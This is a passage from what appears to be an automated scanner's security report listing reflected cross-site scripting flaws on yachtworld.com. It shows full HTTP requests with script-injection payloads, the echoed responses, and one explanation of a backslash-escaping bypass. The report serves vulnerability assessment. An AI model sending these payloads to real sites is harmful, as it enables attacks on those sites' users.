latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:43 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<INPUT size=10 type="text" name="toLength" value="324359f"><script>alert(1)</script>ece5f04902e">
...[SNIP]...

3.338. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [boat_id parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/boatMergedDetails.jsp

Issue detail

The value of the boat_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f50d'%3balert(1)//fac74bd3ec2 was submitted in the boat_id parameter. This input was echoed as 4f50d';alert(1)//fac74bd3ec2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/boatMergedDetails.jsp?boat_id=22664764f50d'%3balert(1)//fac74bd3ec2&ybw=&units=Feet&currency=USD&access=Public&listing_id=53549&url= HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:34:31 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "22664764f50d';alert(1)//fac74bd3ec2"<br>
...[SNIP]...

3.339. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/boatMergedDetails.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91408"><script>alert(1)</script>4cb3beca23d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/boatMergedDetails.jsp?91408"><script>alert(1)</script>4cb3beca23d=1 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:32 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/transitional.dtd">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">

<html la
...[SNIP]...
<a href="/core/uk/listing/yw_listing_search_error.jsp??91408"><script>alert(1)</script>4cb3beca23d=1">
...[SNIP]...

3.340. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [url parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.yachtworld.com
Path:	/core/listing/boatMergedDetails.jsp

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a67e\'%3b5117ae8c10c was submitted in the url parameter. This input was echoed as 6a67e\\';5117ae8c10c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /core/listing/boatMergedDetails.jsp?boat_id=2266476&ybw=&units=Feet&currency=USD&access=Public&listing_id=53549&url=6a67e\'%3b5117ae8c10c HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:37 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html l
...[SNIP]...
<a href="/core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=6a67e\\';5117ae8c10c&back=%2Fcore%2Flisting%2FboatMergedDetails.jsp%3Fboat_id%3D2266476%26listing_id%3D53549%26units%3DFeet%26currency%3DUSD%26access%3DPublic">
...[SNIP]...

3.341. http://www.yachtworld.com/core/listing/boatMergedDetails.jsp [url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/boatMergedDetails.jsp

Issue detail

The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d10be"><script>alert(1)</script>e189293f8d9 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/boatMergedDetails.jsp?boat_id=2266476&ybw=&units=Feet&currency=USD&access=Public&listing_id=53549&url=d10be"><script>alert(1)</script>e189293f8d9 HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:35:34 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Mon, 24 Jan 2011 21:44:50 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html l
...[SNIP]...
<a href="/core/listing/displayPhoto.jsp?boat_id=2266476&boatname=32%27+32+Regulator+WITH+TRAILER+**REDUCED**&photo_revised_date=1285261228000&photo_name=Photo+1&photo=1&url=d10be"><script>alert(1)</script>e189293f8d9&back=%2Fcore%2Flisting%2FboatMergedDetails.jsp%3Fboat_id%3D2266476%26listing_id%3D53549%26units%3DFeet%26currency%3DUSD%26access%3DPublic">
...[SNIP]...

3.342. http://www.yachtworld.com/core/listing/cache/dimensionValues.jsp [N parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/cache/dimensionValues.jsp

Issue detail

The value of the N request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c63ab'%3balert(1)//4063b1cc08d was submitted in the N parameter. This input was echoed as c63ab';alert(1)//4063b1cc08d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/cache/dimensionValues.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&currencyid=100&luom=126&fromPrice=0&fromLength=24&Ne=15&man=regulator&slim=quick&N=0c63ab'%3balert(1)//4063b1cc08d&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; 